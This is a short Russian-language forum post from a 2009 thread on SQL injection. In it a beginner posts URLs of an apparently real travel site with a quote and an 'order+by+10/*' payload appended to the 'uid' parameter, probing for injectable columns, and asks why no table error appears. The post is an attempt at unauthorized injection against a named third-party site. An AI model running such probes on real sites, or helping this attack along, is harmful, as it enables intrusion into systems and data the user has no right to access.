Тема: SQL - INJECTION
Показать сообщение отдельно

  #11  
Старый 03.09.2009, 01:00
Amdell_13
Новичок
Регистрация: 03.07.2009
Сообщений: 3
С нами: 8872816

Репутация: -4
По умолчанию

вот нашёл

code:

http://www.poznay-mir.ru/hotel.php?uid=1422'

Цитата:


Для этого после цифры которая следует после ID ввести команду
order+by+10/*



Вставил так

code:

http://www.poznay-mir.ru/hotel.php?uid=1422'order+by+10/*

Хмм..и чё то не вылазит ошибка таблицы.Почему-так? помогите лузеру?
 
Ответить с цитированием